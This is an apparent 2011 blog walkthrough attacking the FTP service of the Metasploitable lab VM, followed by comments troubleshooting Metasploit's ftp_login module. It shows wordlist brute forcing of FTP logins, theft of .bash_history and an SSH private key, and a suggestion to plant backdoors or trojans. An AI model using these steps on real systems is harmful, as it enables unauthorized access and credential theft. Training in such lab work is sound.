Saturday, August 27, 2011

Metasploitable - Exploring FTP service

root@victor:msf3# ./msfconsole 
     ,           ,
    /             \
   ((_---,,,---_))
      (_)O O(_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 727 exploits - 372 auxiliary - 78 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
       =[ svn r13625 updated today (2011.08.24)


msf > 


We start with identifying any live hosts by doing a nmap ping scan.
msf > nmap -sP 172.72.5.2-254
[*] exec: nmap -sP 172.72.5.2-254
 
Starting Nmap 5.21 ( http://nmap.org ) at 2011-08-25 03:04 IST
Nmap scan report for 172.72.5.143
Host is up (0.00042s latency).
MAC Address: 00:0C:29:8D:8D:A4 (VMware)
Nmap scan report for 172.72.5.254
Host is up (0.00019s latency).
MAC Address: 00:50:56:FD:82:EC (VMware)
Nmap done: 253 IP addresses (2 hosts up) scanned in 5.06 seconds
msf >
We find our target metasploitable system with IP 172.72.5.143. Let's gather information on services running in the target.

sV -> probe open ports to identify service / version info
sT -> TCP Connect scan. Perform a 3-way TCP handshake. can take time but very reliable
msf > nmap -sV -sT 172.72.5.143
[*] exec: nmap -sV -sT 172.72.5.143
Starting Nmap 5.21 ( http://nmap.org ) at 2011-08-25 03:07 IST
Nmap scan report for 172.72.5.143
Host is up (0.00043s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
 
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux 
Service detection performed. Please report any incorrect results at http://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 11.72 seconds
We will explore these services one by one and see what we can find with each.


1. 21/tcp open ftp ProFTPD 1.3.1

Metasploit auxiliary module -> auxiliary/scanner/ftp/ftp_login

set PASS_FILE /opt/metasploit_open/msf3/data/wordlists/unix_passwords.txt
set USER_FILE /opt/metasploit_open/msf3/data/wordlists/unix_users.txt
setg RHOSTS 172.72.5.143
run
[+] 172.72.5.143:21 - Successful FTP login for 'postgres':'postgres'
[*] 172.72.5.143:21 - User 'postgres' has READ/WRITE access
[+] 172.72.5.143:21 - Successful FTP login for 'service':'service'
[*] 172.72.5.143:21 - User 'service' has READ/WRITE access
[+] 172.72.5.143:21 - Successful FTP login for 'user':'user'
[*] 172.72.5.143:21 - User 'user' has READ/WRITE access
We have 3 ftp login credentials now. Let's use these IDs to login to the target.
root@victor:tmp# ftp 172.72.5.143
Connected to 172.72.5.143.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:172.72.5.143]
Name (172.72.5.143:victor): user
331 Password required for user
Password:
230 User user logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lat
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x 3 user user 4096 Aug 24 21:59 .
-rw------- 1 user user 165 May 7 2010 .bash_history
drwx------ 2 user user 4096 May 7 2010 .ssh
drwxr-xr-x 6 root root 4096 Apr 16 2010 ..
-rw-r--r-- 1 user user 220 Mar 31 2010 .bash_logout
-rw-r--r-- 1 user user 2928 Mar 31 2010 .bashrc
-rw-r--r-- 1 user user 586 Mar 31 2010 .profile
226 Transfer complete
.bash_history keeps a history of commands a user has run. Many a times in pentests, I've found useful info on targets, as user ID, passwords, confidential file names, locations, important server names, shared resources etc in this little file.
I will download this file.
Remember Information Gathering is a continuous, on-going phase during a penetration test. You will build upon the collected information to leverage access into the target environment.
ftp> get .bash_history
local: .bash_history remote: .bash_history
200 PORT command successful
150 Opening BINARY mode data connection for .bash_history (165 bytes)
226 Transfer complete
165 bytes received in 0.00 secs (41.6 kB/s)
There is also a .ssh directory. Checking it tells us the presence of public & private ssh keys of the 'user'.
In a pentest, you may come across a scenario where SSH is permitted for device / server administration but passwords are not used. Instead, public key authentication is configured. This means, if you can obtain ssh keys of a [ privileged ] user, then you can gain straight access to the resources without the need of knowing login password. Also, in certain environments, access and security is tied to trusts. Once you can impersonate a 'trusted' / authorized user, gaining access to other juicy resources is a piece of cake.
We go into the .ssh directory and see there is the key pair. Private key is what we will need. Download it.
ftp> cd .ssh
250 CWD command successful
ftp> ls -lta
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x 3 user user 4096 Aug 24 21:59 ..
drwx------ 2 user user 4096 May 7 2010 .
-rw------- 1 user user 668 May 7 2010 id_dsa
-rw-r--r-- 1 user user 609 May 7 2010 id_dsa.pub
226 Transfer complete
ftp> get id_dsa
local: id_dsa remote: id_dsa
200 PORT command successful
150 Opening BINARY mode data connection for id_dsa (668 bytes)
226 Transfer complete
668 bytes received in 0.00 secs (327.8 kB/s)
ftp> get id_dsa.pub
local: id_dsa.pub remote: id_dsa.pub
200 PORT command successful
150 Opening BINARY mode data connection for id_dsa.pub (609 bytes)
226 Transfer complete
609 bytes received in 0.00 secs (379.8 kB/s)
ftp> bye
From .bash_history file, a new user 'msfadmin' seems to be present on the target box.
root@victor:tmp# cat bash_history-user 
ssh-keygen -t dsa
ls
cd .ssh
ls
sudo -s
cd /home/user
lsls .ss
ls .ssj
clear
ls .ssh
sudo cat ~/.ssh/id_dsa.pub >> /home/msfadmin/.ssh/authorized_keys
sudo -s
exit
After brute forcing, it is confirmed that just like with previous 3 users, msfadmin  is a joe account, meaning that the password is same as the user id -> msfadmin. FTP login using msfadmin is successful.

ftp 172.72.5.143
Connected to 172.72.5.143.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:172.72.5.143]
Name (172.72.5.143:victor): msfadmin
331 Password required for msfadmin
Password:
230 User msfadmin logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lat
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw------- 1 msfadmin msfadmin 806 May 18 2010 .bash_history
drwxr-xr-x 5 msfadmin msfadmin 4096 May 18 2010 .
drwx------ 2 msfadmin msfadmin 4096 May 18 2010 .ssh
-rw-r--r-- 1 msfadmin msfadmin 0 May 7 2010 .sudo_as_admin_successful
-rw------- 1 msfadmin msfadmin 98 Apr 28 2010 .lesshst
drwxr-xr-x 6 msfadmin msfadmin 4096 Apr 28 2010 vulnerable
drwxr-xr-x 4 msfadmin msfadmin 4096 Apr 17 2010 .distcc
drwxr-xr-x 6 root root 4096 Apr 16 2010 ..
-rw-r--r-- 1 msfadmin msfadmin 586 Mar 16 2010 .profile
226 Transfer complete
The user has Read/Write privileges using FTP service. Even though these users are non-root accounts, and have RW privs in their home directories, we have gained a foothold into the target. This is also applicable to other system / network services such as samba [ file sharing ] or ssh [ remote access ]. Using these accounts, it is now possible for us to explore the file system, configuration(s), set up, any specific software(s) / applications that are installed and may be vulnerable. Also a good idea is to upload backdoor / malware / trojan / privilege escalation exploit(s) on the server. The expectation is to wait for some user, usually root or root privileged user, to access these malicious exes and run them. Once the exe runs, depending upon its function, a variety of actions can be performed. Actions can include and are not limited to gaining shell, execute commands, sniff sensitive data off the wire and send the logs to the attacker, enumerate other systems in the network environment for further exploitation etc, and many more.
In a pentest, however, always document any changes you've made to the file system and remember to clean up exe, configuration changes etc, before you sign off for the day. Normally, the any changes by the pentester and associated risk must be discussed with customer and arrived at, in the Terms of Engagement.
Next  up --> Exploring SSH service

11 comments:

  1. Nice work...

    But i am facing some problems in finding the login usernames password with the ftp_login of metasploit.

    1) first i am using backtrack 5. The files containing the usernames and passwords is in
    /opt/framework3/msf3/data/wordlists

    2) Second, the ftp_login is rejecting the credentilas user:user, postgres:posgres and service:service

    Do you have any idea why this is happening? do i have to do something else first to execute this module or set another parameter in the module expcept for rhost, username file and password files?
    thank you
    chris

    ReplyDelete
  2. Hi Chris,

    Are you able to login to FTP manually?

    take care,
    KG

    ReplyDelete
  3. Yes, I am able to login to FTP manually...ncrack is working correctly also and it is able to find the usernames/passwords...can it be a bug in the ftp_login module?

    ReplyDelete
  4. Can you please post 'show options'?

    take care,
    KG

    ReplyDelete
  5. Hope this helps...




    msf auxiliary(ftp_login) > show options

    Module options (auxiliary/scanner/ftp/ftp_login):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    BLANK_PASSWORDS true no Try blank passwords for all users
    BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
    PASSWORD no A specific password to authenticate with
    PASS_FILE /opt/framework3/msf3/data/wordlists/unix_passwords.txt no File containing passwords, one per line
    RHOSTS 192.168.153.132 yes The target address range or CIDR identifier
    RPORT 21 yes The target port
    STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
    THREADS 1 yes The number of concurrent threads
    USERNAME no A specific username to authenticate as
    USERPASS_FILE no File containing users and passwords separated by space, one pair per line
    USER_AS_PASS true no Try the username as the password for all users
    USER_FILE /opt/framework3/msf3/data/wordlists/unix_users.txt no File containing usernames, one per line
    VERBOSE true yes Whether to print output for all attempts

    ReplyDelete
  6. This looks fine. Can you start fresh & try the following:

    1. Manually set 1 single user name and password: set password postgres
    set username postgres
    run

    2. Create a new username file with only 1 user, say postgres. Similarly, create a new password file with 1 password, postgres. Then run the module.

    Post the module run output in these cases, in case it still doesn't confirm the user.

    take care,
    KG

    ReplyDelete
  7. 1) worked.

    2) didnt worked!!!

    wtf? is it a bug?

    ReplyDelete
    Replies
    1. Anonymous, I am also using Back Track 5 updated till date. Since the default password file was taking long to brute force I tried making a new file with 3 usernames and passwords and it worked. You can give it a try as well.
      Cheers

      Delete
  8. Glad it worked. You could check with backtrack forums or @ irc. Folks over there can look into this issue & confirm whether this is specific to bt5.

    thanks,
    KG

    ReplyDelete

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.